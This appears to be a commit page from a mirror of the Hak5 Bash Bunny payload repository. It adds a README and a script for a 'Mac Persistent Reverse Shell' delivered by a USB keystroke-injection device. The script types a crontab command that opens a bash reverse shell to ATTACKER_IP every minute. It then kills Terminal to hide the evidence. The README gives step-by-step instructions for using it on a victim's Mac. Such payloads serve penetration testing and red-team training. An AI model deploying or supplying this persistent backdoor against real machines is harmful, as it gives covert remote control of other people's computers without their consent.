mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Persistent Reverse Shells for MacOS and Windows 10 (#306)
This commit is contained in:
@@ -0,0 +1,44 @@
|
||||
# Reverse Shell Mac for Bash Bunny
|
||||
|
||||
* Author: 0dyss3us (KeenanV)
|
||||
* Version: 1.2
|
||||
|
||||
## Description
|
||||
|
||||
Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.
|
||||
* Targets MacOS
|
||||
* Connection can be closed and reconnected at any time
|
||||
* Deploys in roughly 23 sec
|
||||
* Works well with NetCat as the listener
|
||||
|
||||
## Requirements
|
||||
|
||||
Have a working Bash Bunny :)
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | STATUS |
|
||||
| -------------------- | ---------------------------- |
|
||||
| Purple | Setup |
|
||||
| Amber (Single Blink) | Launching Terminal |
|
||||
| Amber (Double Blink) | Creating cron job |
|
||||
| White (Fast Blink) | Cleaning up |
|
||||
| Green | Finished |
|
||||
|
||||
## Configuration and Execution
|
||||
|
||||
1. Plug in Bash Bunny in arming mode
|
||||
2. Move files from MacPersistentReverseShell to either switch folder
|
||||
3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
|
||||
5. Unplug Bash Bunny and switch it to the position the payload is loaded on
|
||||
6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
|
||||
7. Unplug the Bash Bunny and go to attacker's machine
|
||||
8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat)
|
||||
* If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh)
|
||||
* If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe.
|
||||
9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
|
||||
10. Once a bash shell prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in
|
||||
|
||||
## Discussion
|
||||
|
||||
[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post.
|
||||
@@ -0,0 +1,32 @@
|
||||
# Title: Mac Persistent Reverse Shell
|
||||
# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host
|
||||
# Author: 0dyss3us (KeenanV)
|
||||
# Props:
|
||||
# Version: 1.2
|
||||
# Category: Remote Access
|
||||
# Target: MacOS
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Sets attack modes and stores current switch position
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
|
||||
GET_SWITCH_POSITION
|
||||
|
||||
# Opens the terminal
|
||||
LED STAGE1
|
||||
RUN OSX terminal
|
||||
Q DELAY 2000
|
||||
|
||||
# Makes a cron job that will run once every minute
|
||||
Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab -
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
LED CLEANUP
|
||||
# Clears and kills the terminal to hide the evidence
|
||||
Q STRING clear
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING killall Terminal
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
Reference in New Issue
Block a user